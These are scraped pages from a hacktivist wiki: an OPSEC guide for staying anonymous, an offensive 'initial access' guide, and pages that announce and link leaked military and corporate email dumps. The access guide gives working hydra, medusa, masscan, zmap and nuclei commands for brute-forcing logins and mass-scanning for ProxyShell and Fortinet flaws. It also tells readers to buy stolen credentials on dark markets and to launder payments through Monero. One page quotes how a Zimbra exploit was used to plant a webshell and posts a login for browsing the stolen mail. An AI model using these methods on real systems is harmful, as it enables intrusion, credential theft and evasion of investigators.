* https://resumen.cl/articulos/hackeo-a-inteligencia-de-ff-aa-y-policias-abunda-informacion-sobre-organizaciones-sociales-pero-casi-no-hay-menciones-al-crimen-organizado<br />
* https://resumen.cl/articulos/actos-y-marchas-feministas-fueron-espiadas-por-la-pdi-en-la-region-de-valparaiso-segun-documentos-hackeados-al-estado-mayor-conjunto<br />
* https://resumen.cl/articulos/archivos-hackeados-revelan-que-organizaciones-sociales-de-osorno-tambien-fueron-investigadas-por-fuerzas-armadas-y-pdi<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-informe-concluye-que-fpmr-podia-levantase-en-armas-con-apoyo-internacional-pese-a-que-organizacion-fue-desarticulada-hace-30-anos<br />
* https://resumen.cl/articulos/hackeo-a-las-ffaa-actividad-por-la-nacionalizacion-del-cobre-en-que-participo-daniel-jadue-era-investigada-por-la-pdi<br />
* https://resumen.cl/articulos/editorial-el-hackeo-al-emco-y-la-persistencia-de-una-odiosa-doctrina<br />
* https://www.t13.cl/noticia/ex-ante/nacional/el-manual-guerra-irregular-colombia-general-iturriaga-compartio-emco-27-09-2022<br />
* https://resumen.cl/articulos/mails-hackeados-al-emco-muestran-que-policias-y-ffaa-espiaban-al-colegio-de-profesores-as-desde-antes-del-estallido-social<br />
* https://resumen.cl/articulos/pdi-investigaba-actividades-de-grupos-de-ciclistas-de-concepcion-revelan-documentos-hackeados<br />
* https://www.biobiochile.cl/especial/bbcl-investiga/noticias/reportajes/2022/09/28/hablan-hackers-revelan-que-estado-mayor-conjunto-eligio-no-reparar-falla-que-posibilito-ataque.shtml<br />
* https://www.elclarin.cl/2022/09/27/tras-filtracion-de-correos-de-las-ff-aa-ex-miembros-del-ejercito-y-carabineros-denuncian-seguimiento-a-organizaciones-sociales/<br />
<br />
=== Peru ===<br />
* https://twitter.com/laencerronaperu/status/1578060867580690434#m<br />
<br />
=== El Salvador ===<br />
* https://elfaro.net/es/202210/el_salvador/26418/El-d%C3%ADa-en-que-inici%C3%B3-la-masacre-de-marzo-cuatro-l%C3%ADderes-nacionales-de-la-MS-13-salieron-de-Zacatecoluca.htm<br />
* https://www.elfaro.net/es/202210/el_salvador/26443/PNC-supo-de-la-liberaci%C3%B3n-ilegal-de-Crook-desde-noviembre-de-2021.htm<br />
* https://elfaro.net/es/202304/el_salvador/26800/policia-pidio-investigar-a-militares-del-estado-mayor-por-detencion-ilegal-de-un-joven-en-el-regimen<br />
<br />
=== Colombia ===<br />
* https://www.elespectador.com/judicial/coronel-r-santiago-herrera-el-confeso-autor-de-falsos-positivos-que-ahora-es-consultor-secreto-de-militares/</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Opsec_Measures&diff=1668Opsec Measures2023-11-09T16:43:56Z<p>Enlacehacktivista: </p>
<hr />
<div>== Recommended Measures ==<br />
Here you will find resources that will help you from a technological operational security perspective. OPSEC is much more than simply what networks and technology you use.<br />
<br />
Make sure that you use a separate and fully encrypted computer to work from. This can be a virtual machine, USB, external drive or a throw away laptop. All of your network traffic should be routed entirely over Tor (whonix is the best for this). See [https://enlacehacktivista.org/images/6/69/Hack_back1.txt Phineas Fishers operational security practices] for hackers OPSEC.<br />
<br />
== OPSEC Tools ==<br />
There is no silver bullet when it comes to protecting yourself, staying safe and anonymous. It's important to know how to use the tools we rely on to keep us safe and free. Below you will find industry standard tools that will help keep your hacktivity private and secure.<br />
<br />
When communicating with journalists or other hackers it's important to keep all communication end-to-end encrypted, network connection over Tor and to [https://www.wired.com/2015/05/silk-road-2/ not use aliases or emails that lead back to your real world identity].<br />
<br />
* https://www.qubes-os.org ([http://qubesosfasa4zl44o4tws22di6kepyzfeqv3tg4e3ztknltfxqrymdad.onion Tor])<br />
* https://www.whonix.org ([http://www.dds6qkxpwdeubwucdiaord2xgbbeyds25rbsgr73tbfpqpt4a6vjwsyd.onion Tor])<br />
* https://tails.net<br />
* The whonix wiki has lots of great info on anonymity even if you're not using whonix: https://www.whonix.org/wiki/Documentation<br />
* [https://www.whonix.org/wiki/Comparison_with_Others Custom]: https://gitlab.torproject.org/legacy/trac/-/wikis/doc/TransparentProxy<br />
* Use veracrypt to encrypt your virtual machines and hard drive. Make sure to save your hacktivity inside of a [https://veracrypt.eu/en/Hidden%20Volume.html hidden volume] for plausible deniability. https://veracrypt.fr<br />
* Tor browser: https://www.torproject.org ([http://2gzyxa5ihm7nsggfxnu52rck2vv4rvmdlkiu3zzui5du4xyclen53wid.onion/index.html Tor])<br />
* Disable javascript (set Security Level to "Safest" in Tor Browser)<br />
* If you plan on transacting you should always start from monero and swap your XMR to another coin. This reduces traceability (over Tor) and will defeat standard blockchain investigations. https://www.getmonero.org ([http://monerotoruzizulg5ttgat2emf4d6fbmiea25detrmmy7erypseyteyd.onion/index.html Tor])<br />
<br />
== Guides and Information ==<br />
* [https://www.anarsec.guide/ AnarSec]<br />
Interesting techniques for detecting [[wikipedia:Evil Maid attack|evil maid attacks]], along with lots of great information on Qubes, Tails, GrapheneOS and more.<br />
* [https://www.notrace.how/ No Trace Project]<br />
Mostly focused on surveillance of physical actions, but plenty is relevant for hacking. Hackers will need to watch out for physical frame grabbers and keyloggers in addition to [https://www.notrace.how/earsandeyes/ microphone and cameras], along with being mindful of [https://www.notrace.how/resources/read/who-wrote-that.html what they write.]<br />
<br />
== Know your enemy ==<br />
Cyber investigators will use many techniques to uncover your identity to facilitate in a successful arrest. Books as seen below help us see and understand some of the tactics they use, even trying to infiltrate groups to collect information. <br />
<br />
'''Always be aware, know your enemy!'''<br />
<br />
* (Book) Hunting Cyber Criminals: A Hacker's Guide to Online Intelligence Gathering Tools and Techniques 1st Edition<br />
* (Book) Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&diff=1074Initial Access Tactics, techniques and procedures2023-06-25T22:50:53Z<p>Enlacehacktivista: </p>
<hr />
<div>== Phishing ==<br />
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious email attachment or click on a malicious link. As hacktivists we want to find away to gain entry inside the targets network as quickly and easily as possible to leak documents, expose lies and corruption and free the truth!<br />
<br />
==== Tools ====<br />
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html<br />
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165<br />
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55<br />
* https://www.xanthus.io/mastering-the-simulated-phishing-attack<br />
* https://github.com/Arno0x/EmbedInHTML<br />
* https://github.com/L4bF0x/PhishingPretexts<br />
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html<br />
* https://book.hacktricks.xyz/phishing-methodology<br />
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective<br />
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/<br />
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/<br />
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]<br />
* https://github.com/curtbraz/PhishAPI<br />
* https://github.com/edoverflow/can-i-take-over-xyz<br />
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/<br />
<br />
== Password Attacks ==<br />
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!<br />
<br />
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.<br />
<br />
=== Username creation based on recon/osint ===<br />
Create a bespoke username word list based on OSINT, recon and your targets employee LinkedIn and other social media pofiles to aid in your password attacks.<br />
<br />
* https://github.com/Mebus/cupp<br />
* https://github.com/digininja/RSMangler<br />
* https://github.com/sc0tfree/mentalist<br />
* https://github.com/urbanadventurer/username-anarchy<br />
* https://github.com/vysecurity/LinkedInt<br />
* https://github.com/initstring/linkedin2username<br />
* https://bitbucket.org/grimhacker/office365userenum/src/master<br />
* https://github.com/shroudri/username_generator<br />
* https://github.com/digininja/CeWL<br />
<br />
=== Passwords ===<br />
Common and leaked credentials to test login portals and network services.<br />
<br />
* https://github.com/danielmiessler/SecLists/tree/master/Passwords<br />
Using seclists usernames and passwords output all username and password files into one big file:<br />
<br />
Usernames:<br />
<br />
<code>find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt</code><br />
<br />
Passwords:<br />
<br />
<code>find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt</code><br />
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt<br />
* https://github.com/ihebski/DefaultCreds-cheat-sheet<br />
* https://default-password.info<br />
<br />
=== Password cracking tools ===<br />
* https://www.kali.org/tools/ncrack<br />
* https://www.kali.org/tools/wfuzz<br />
* https://www.kali.org/tools/medusa<br />
* https://www.kali.org/tools/patator<br />
* https://www.kali.org/tools/hydra<br />
A basic example using a wordlist in the format of email:pass/user:pass. <br />
<br />
<code>hydra -C creds.txt target.com -s 443 http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records." -S</code><br />
* https://www.kali.org/tools/brutespray<br />
<br />
=== Searching leaks ===<br />
* https://github.com/khast3x/h8mail [Free but includes paid services]<br />
<br />
==== Services ====<br />
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''<br />
<br />
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.<br />
<br />
* https://haveibeenpwned.com<br />
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]<br />
* https://dehashed.com [Paid. Accepts crypto (BTC)]<br />
<br />
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, email:pass.<br />
<br />
=== Buying access ===<br />
<br />
You can use the genesis market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an admin account. Any account that allows internal access is always a great start. Invites can be found on forums and markets.<br />
* http://genesis7zoveavupiiwnrycmaq6uro3kn5h2be3el7wdnbjti2ln2wid.onion/guest/login [Paid]<br />
<br />
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).<br />
<br />
* https://xss.is<br />
* https://exploit.in [Free & Paid]<br />
<br />
=== Password spraying ===<br />
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.<br />
<br />
* https://github.com/dafthack/MSOLSpray<br />
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying<br />
* https://github.com/blacklanternsecurity/TREVORspray<br />
* https://github.com/knavesec/CredMaster<br />
* https://github.com/xFreed0m/RDPassSpray<br />
* https://github.com/dafthack/MailSniper<br />
* <code>medusa -U usernames.txt -p [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst Spring2023] -H targets.txt -M ssh -O results.txt</code><br />
<br />
=== Hash cracking ===<br />
Crack password hashes using both online and offline tools!<br />
<br />
Identify hash:<br />
* https://github.com/blackploit/hash-identifier<br />
<br />
Online tools:<br />
* https://hashes.com/en/decrypt/hash [Free & Paid]<br />
* https://crackstation.net<br />
Offline tools:<br />
* https://github.com/hashcat/hashcat<br />
* https://github.com/openwall/john<br />
* https://github.com/NotSoSecure/password_cracking_rules<br />
<br />
== Spray and pray ==<br />
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or our target companies IP ranges for critical vulnerabilities and attack protocols with a dictionary attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target emails out of their Microsoft exchange email servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then scan the IP addresses you discover. You can resolve the IP addresses to their respective domains (reverse DNS lookup) using <code>nmap -Pn -sS -R -iL targets.txt -oA results</code>, however this is also done by default when performing a vulnerability scan using NSE.<br />
<br />
=== Vulnerability scanning ===<br />
Scanning for and exploiting CVE vulnerabilities on public facing applications.<br />
<br />
==== Tools ====<br />
* https://www.kali.org/tools/masscan<br />
Scan IP ranges, output only ipv4 addresses and block known honeypots:<br />
<br />
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code><br />
<br />
Add the port numbers to the end of discovered IPs in the format: ip-address:443<br />
<br />
<code>sed -i 's/$/:443/' results.txt</code><br />
<br />
[https://www.bleepingcomputer.com/news/security/researchers-compile-list-of-vulnerabilities-abused-by-ransomware-gangs Vuln] scan IPs:<br />
<br />
<code>nuclei -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code><br />
<br />
Scan for multiple different ports:<br />
<br />
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code><br />
<br />
Add unique port numbers to the end of discovered IPs in the format: ip-address:port<br />
<br />
<code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code><br />
<br />
[https://www.ic3.gov/Media/News/2021/210402.pdf Vuln] scan IPs:<br />
<br />
<code>nuclei -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code><br />
<br />
* https://github.com/zmap/zmap<br />
[https://enlacehacktivista.org/hackback2.webm Guacamaya] scanning for proxyshell using zmap and [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]: <br />
<pre><br />
sudo zmap -q -p 443 | httpx -silent -s -sd -location \<br />
> | awk '/owa/ { print substr($1,9) }' > owa.txt<br />
</pre><br />
<pre><br />
nmap -p 443 -Pn -n \<br />
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt<br />
</pre><br />
<br />
=== Password attacks ===<br />
You can perform these attacks against protocols such as SSH, RDP, FTP, telnet, VNC, mysql.<br />
==== Tools ====<br />
* https://www.kali.org/tools/medusa<br />
Scan your target(s) for RDP (3389):<br />
<br />
<code>sudo masscan -Pn -sS -iL [https://lite.ip2location.com/ip-address-ranges-by-country ranges.txt] --rate 20000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt</code><br />
<br />
Now use [https://nakedsecurity.sophos.com/2017/11/15/ransomware-spreading-hackers-sneak-in-through-rdp/ RDP] cracking [https://github.com/vanhauser-thc/thc-hydra tools] against discovered IPs.</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Enlace_Hacktivista&diff=970Enlace Hacktivista2023-04-25T17:34:57Z<p>Enlacehacktivista: </p>
<hr />
<div>Welcome to Enlace Hacktivista! This site aims to:<br />
<br />
# Document [[Hacker History|hacker history]].<br />
# [[Learn to hack|Share educational resources]] for hackers and those who want to learn.<br />
# Provide a space for hackers to publish their hacks, leaks, and [[:Category:Communiques|communiques]]. If you have something to publish, [[contact|write us]].<br />
# Publish news relevant to hackers, with a focus on supporting [[:Category:Ongoing Cases|hackers imprisoned or facing trial]]. If you know important news we should publish, [[contact|write us]].<br />
<br />
Feel free to edit the wiki! See [[Editing]]<br />
<br />
[https://twitter.com/GuacamayanLeaks GuacamayanLeaks] is a fake twitter account [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya seemingly operated by the people running anti-AMLO twitter bots.] Neither Guacamaya nor Enlace Hacktivista will ever have accounts on social networks.<br />
<br><br />
El grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/GuacamayanLeaks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
== News ==<br />
<br />
* Jan 13, 2023: An anonymous whistleblower sent us phone forensics software and documentation from Cellebrite and MSAB. These companies sell to police and governments around the world who use it to collect information from the phones of journalists, activists, and dissidents. Both companies' software is well documented as being used in human rights abuses[https://www.accessnow.org/what-spy-firm-cellebrite-cant-hide-from-investors/][https://theintercept.com/2021/06/14/myanmar-msab-eu-technology-regulation/][https://cpj.org/2021/07/botswana-cellebrite-search-journalists-phone/] The leaks are available for download as torrents[https://enlacehacktivista.org/cellebrite.torrent][https://enlacehacktivista.org/MSAB.torrent] or direct download[https://files.enlacehacktivista.org/cellebrite/][https://files.enlacehacktivista.org/msab.tar.zst]<br />
* Sep 19, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya4.txt statement,] [https://enlacehacktivista.org/poema_guacamaya.txt poem,] and [https://enlacehacktivista.org/hackback2.webm video] to publish from the hacker group [[Guacamaya]] on their leak of military and police emails from various countries. For more information see [[Fuerzas_Represivas|here.]]<br />
* Aug 7, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya3.txt statement] to publish from hackers going by the name "Guacamaya", along with 5 TB of email from [https://www.opendemocracy.net/en/democraciaabierta/la-fiscal%C3%ADa-general-de-la-naci%C3%B3n-en-colombia-devorada-por-corrupci%C3%B3n-en/ Fiscalia of Colombia.] See [[Fiscalia|here]] for more information.<br />
* Aug 1, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya2.txt statement] to publish from hackers going by the name "Guacamaya", along with several TB of email from various mining and oil companies. The emails can be searched [https://piler.enlacehacktivista.org here,] or downloaded [https://files.enlacehacktivista.org here.] See [[Extractivist Leaks/es|here]] for more information.<br />
* Jul 21, 2022: Motivated by Liberty Counsel's legal attacks against LGBTQ and abortion rights, anonymous hackers hacked Liberty Counsel and a host of other evangelical and right-wing groups who used the same web developer. Recently while celebrating the decision to overturn Roe v Wade, Liberty Counsel's director said they [https://www.rollingstone.com/politics/politics-features/roe-supreme-court-justices-1378046/ prayed with Supreme Court justices.] A statement by the hackers is available [https://enlacehacktivista.org/libertycounsel.txt here,] and the leaked data is available as a [https://enlacehacktivista.org/libertycounsel.torrent torrent.]<br />
* May 13, 2022: Anonymous hackers sent us around 250 GB of email from REA Kaltim Plantations, a palm oil company in Indonesia. The hackers were motivated by the company's land theft and abuses towards indigenous residents, along with environmental damage. A brief description can be found [https://ejatlas.org/print/pt-rea-kaltim-plantations-in-east-kalimantan here.] The hackers would also like to give a shout out to Kecoak Elektronik. The emails are available as a [https://enlacehacktivista.org/reakaltim.torrent torrent,] or [https://files.enlacehacktivista.org/rea.co.id/ direct download.]<br />
* May 2, 2022: Nauru is a small island where Australia keeps refugees and asylum seekers in horrific conditions. By keeping them on a remote island, Australia intends to invisibilize their situation. Motivated by this, anonymous hackers sent us 55 GB of email of the island's police, along with a [https://enlacehacktivista.org/nauru.txt statement.] The mail can be downloaded as a [https://enlacehacktivista.org/nauru.torrent torrent,] or [https://files.enlacehacktivista.org/npf.gov.nr/ directly.] More information is available [[Nauru Police Force|here.]]<br />
* March 6, 2022: We've received a [https://enlacehacktivista.org/comunicado_guacamaya.txt statement] and [https://enlacehacktivista.org/hackback.webm video] to publish from hackers going by the name "Guacamaya" about their hack of the company CGN/Pronico. Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities. The video shows in detail how the hackers gained access in the company's network, downloaded emails and files, and then proceeded to sabotage the company's computers. Credits for the video's soundtrack are available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here.] All the leaked files are available for download from [https://ddosecrets.com/wiki/Mining_Secrets DDoS.] Forbidden Stories [https://forbiddenstories.org/case/mining-secrets/ have just published their investigations] based on the leak. Also the company [https://pronico.gt/comunicado-oficial-de-solway-investment-group-sobre-el-cierre-definitivo-de-la-minera-en-el-estor-izabal-guatemala/ on it's website] has published a statement where they announce that sustainable mining is a lie, and call on the Guatemalan government to not only suspend their own mining license, but suspend all licenses for surface mining, as Honduras recently did. It's possible that statement was posted by the hackers and not actually by the company. More information is available on the [[Pronico]] page.<br />
<br />
<br />
[https://lists.riseup.net/www/subscribe/enlacehacktivista Subscribe to our mailing list] to get notified when news is published.</div>Enlacehacktivistahttps://enlacehacktivista.org/index.php?title=Fuerzas_Represivas&diff=914Fuerzas Represivas2023-04-19T21:11:46Z<p>Enlacehacktivista: /* El Salvador */</p>
<hr />
<div>Nos llega 10 TB de correos filtrados por el grupo [[Guacamaya]], esta vez de organismos militares y policiales de varios paises. Publican un [https://enlacehacktivista.org/comunicado_guacamaya4.txt comunicado] y [https://enlacehacktivista.org/poema_guacamaya.txt poema] explicando sus motivos y un [https://enlacehacktivista.org/hackback2.webm video] que muestra como se descargaron los correos de esta filtración y de las [https://enlacehacktivista.org/index.php?title=Fiscalia/en dos] [https://enlacehacktivista.org/index.php?title=Extractivist_Leaks/es anteriores.]<br />
<br />
Cabe mencionar que el grupo Guacamaya nunca tendrá cuentas en redes sociales. [https://twitter.com/guacamayahacks Esta cuenta] es [https://www.milenio.com/opinion/viri-rios/no-es-normal/el-engano-de-la-cuenta-falsa-de-guacamaya falsa.]<br />
<br />
Aparte del EMCO no hemos tenido tiempo aún revisar si contienen información personal sensible o peligrosa así que de momento están solo disponibles para periodistas y otros investigadores. Para acceso a los correos, contacta con [mailto:press@ddosecrets.com DDoSecrets]<br />
<br />
== El Estado Mayor Conjunto de las Fuerza Armadas de Chile ==<br />
<br />
Se puede descargar sus correos de: https://files.enlacehacktivista.org/emco.mil.cl/<br />
<br><br />
O como torrent de: https://files.enlacehacktivista.org/emco.mil.cl.torrent<br />
<br><br />
Hay dos archivos .zip para cada empleado, nombre.zip - que contiene los correos de su bandeja de entrada, y nombre_sent.zip - que contiene los correos de su carpeta de enviados. Dentro de cada zip estan los correos en formato .eml. Se puede usar un cliente de correo como Thunderbird con la extensión ImportExportTools NG (https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/) para importar todo los .eml<br />
<br />
También tenemos un buscador basico donde se puede ver los correos en linea: https://piler.enlacehacktivista.org/<br />
<br><br />
Con el usuario: auditor@emco.mil.cl<br />
<br><br />
y la contraseña: hunter2<br />
<br><br />
Puede que no encuentre todos los correos, si se va a hacer una investigación seria es mejor descargar todo y buscar en su computadora.<br />
<br />
Puede ser de interes para quienes investigan la militarización y ocupación del territorio Mapuche buscar por ejemplo: SITREP Araucanía<br />
<br><br />
SITREP son informes diarios de actividades militares. También puede ser de interes los correos de depani@investigaciones.cl y los informes de JENAINPOL<br />
<br />
== Secretaría de la Defensa Nacional de México (6 TB) ==<br />
<br />
Terminan sus fichas sobre líderes sociales con: <br />
<blockquote><br />
Hasta el momento no se tiene conocimiento que mantenga vínculos con integrantes de organizaciones delictivas.<br />
</blockquote><br />
SEDENA no puede decir lo mismo sobre si misma.<br />
<br><br />
No hemos tenido tiempo de investigar mucho, pero [https://enlacehacktivista.org/sedena acá] hemos subido algunos documentos que pueden ser de interés público, dónde se ve que clase de actividades la SEDENA está investigando como "amenazas a la seguridad nacional" en vez de investigar al crimen organizado y otras amenazas reales.<br />
<br />
=== Explicación del Hackeo ===<br />
Según las hackers:<br />
<blockquote><br />
Todas las demás filtraciones fueron descargadas con Proxyshell como se ve en [https://enlacehacktivista.org/hackback2.webm el video,] pero SEDENA fue con una vulnerabilidad antigua de Zimbra. Fue simplemente usar [https://github.com/Josexv1/CVE-2022-27925 esto] para explotar la vulnerabilidad y subir una webshell, y luego usar la webshell para descargar todos los correos de /opt/zimbra/store. Ya había muchas otras webshells allí, con fecha desde el 5 de Julio (la fecha puede ser facilmente cambiado con touch -t pero también esta documentado que en Julio se empezó a explotar muchos servidores de Zimbra) y vimos que otros hackers también estuvieron descargando los correos a la vez.<br />
</blockquote><br />
<br />
=== Cobertura mediática ===<br />
* https://ddosecrets.com/wiki/Secretar%C3%ADa_de_la_Defensa_Nacional_de_M%C3%A9xico#Research<br />
* https://latinus.us/2022/09/29/loret-capitulo-96/<br />
Sobre porque se publicó primero en Latinus, la guacamaya respondió:<br />
<blockquote><br />
Unos cuantos periodistas ya tenían la filtración, lo que pasa es que hacer una investigación de calidad se demora meses, Loret solo tardó unos días en encontrar algunos informes médicos de AMLO. Nos gustaría que todas tuvieran acceso a la filtración, pero en este caso no es posible, ya que hay información que en manos de narcos podría poner en riesgo a mucha gente. Sin embargo se compartió con varios periodistas de investigación, que escribieron a DDoSecrets o Enlace Hacktivista, nos guste su política y sus reportajes o no.<br />
</blockquote><br />
* https://elpais.com/mexico/2022-10-02/tengo-miedo-de-que-me-hagan-dano-los-correos-del-ejercito-mexicano-desvelan-decenas-de-abusos-sexuales-en-la-institucion.html<br />
* https://www.animalpolitico.com/2022/10/sedena-software-espia-periodistas-defensores-derechos-humanos/<br />
* https://aristeguinoticias.com/0310/mexico/sedena-nego-y-oculto-contratos-de-espionaje-pero-hackeo-evidencio-que-si-existen-periodista/<br />
* https://elpais.com/mexico/2022-10-04/el-ejercito-mexicano-investigo-a-diputados-senadores-y-gobernadores.html<br />
* https://www.sinembargo.mx/03-10-2022/4263091<br />
* https://la-lista.com/derechos-humanos/2022/10/10/guacamayaleaks-los-planes-secretos-del-ejercito-para-cerrar-el-caso-ayotzinapa<br />
* https://contralacorrupcion.mx/la-secreta-operacion-limpieza-del-ejercito-en-el-caso-ayotzinapa/<br />
* https://www.proceso.com.mx/nacional/2022/10/5/sedena-leaks-el-ejercito-autor-de-la-reforma-para-controlar-la-guardia-nacional-294665.html<br />
* https://causanatura.org/periodismo-cn/con-pena-nieto-y-amlo-sedena-monitoreo-a-opositores-al-fracking-en-la-huasteca-de-san-luis-potosi<br />
* https://twitter.com/isagvh/status/1577875084278112259<br />
* https://www.youtube.com/watch?v=OyNpRrhgHJQ<br />
* https://undergroundperiodismo.com/entrega-sre-a-la-sedena-reportes-internos-sobre-simpatizantes-del-ezln-en-europa/<br />
* https://laotraopinion.com.mx/guacamaya-leaks-las-fiestas-privadas-de-la-sedena-con-abusos-sexuales/<br />
* https://lahojadelpueblo2022.blogspot.com/2022/10/el-ejercito-le-seguia-los-pasos-al.html<br />
* https://www.proceso.com.mx/nacional/2022/11/6/cndh-estalla-por-reportaje-de-proceso-que-revela-ordenes-de-la-sedena-sobre-caso-ayotzinapa-296486.html<br />
* https://lasillarota.com/nacion/2022/11/11/guacamaya-leaks-sedena-pidio-zaldivar-suavizar-jueces-por-delitos-de-militares-401304.html<br />
* https://ejercitoespia.r3d.mx/<br />
* https://aristeguinoticias.com/1303/mexico/guacamaya-leaks-documentan-seguimiento-militar-a-normalistas/<br />
<br />
== Otros ==<br />
<br />
* Policía Nacional Civil de El Salvador (4 TB, @pnc.gob.sv)<br />
* Comando General de las Fuerzas Militares de Colombia (275 GB, @cgfm.mil.co)<br />
* Fuerza Armada de El Salvador (50 GB, @faes.gob.sv)<br />
* Comando Conjunto de las Fuerzas Armadas de Peru (35 GB, @ccffaa.mil.pe)<br />
* Ejercito del Peru (70 GB, @ejercito.mil.pe)<br />
<br />
== Arte ==<br />
<br />
Ilustraciones del [https://enlacehacktivista.org/hackback2.webm video] que muestra el hackeo. La banda sonora del video se puede encontrar [https://enlacehacktivista.org/guacamaya_soundtrack2.txt aquí.]<br />
<br />
[[File:Resistencia milenaria2.png|400px|border|una guacamaya descargando correos]]<br />
[[File:Fin_de_la_milicia.png|400px|border|Fin de la milicia]]<br />
<br />
== Cobertura mediática ==<br />
<br />
=== Chile ===<br />
* https://resumen.cl/articulos/hackeo-armada-espio-vecinos-recolectaban-leche-ninos-pandemia<br />
* https://resumen.cl/articulos/grupos-ambientales-del-biobio-en-la-mira-del-ejercito-organizaciones-contra-la-central-rucalhue-y-coordinadora-chorera-forman-parte-de-documentos-hackeados-a-las-fuerzas-armadas<br />
* https://resumen.cl/articulos/hackeo-a-correos-del-ejercito-revelo-que-espiaban-a-las-juventudes-comunistas-a-traves-de-redes-sociales<br />
* https://resumen.cl/articulos/hackeo-filtra-que-armada-ha-gastado-mas-de-690-millones-en-estados-de-excepcion-en-el-biobio-148-millones-solo-en-viaticos-viaticos-y-gratificaciones<br />
* https://interferencia.cl/articulos/mails-hackeados-informes-del-emco-recomendaron-familias-castrenses-estar-abastecidas-al<br />
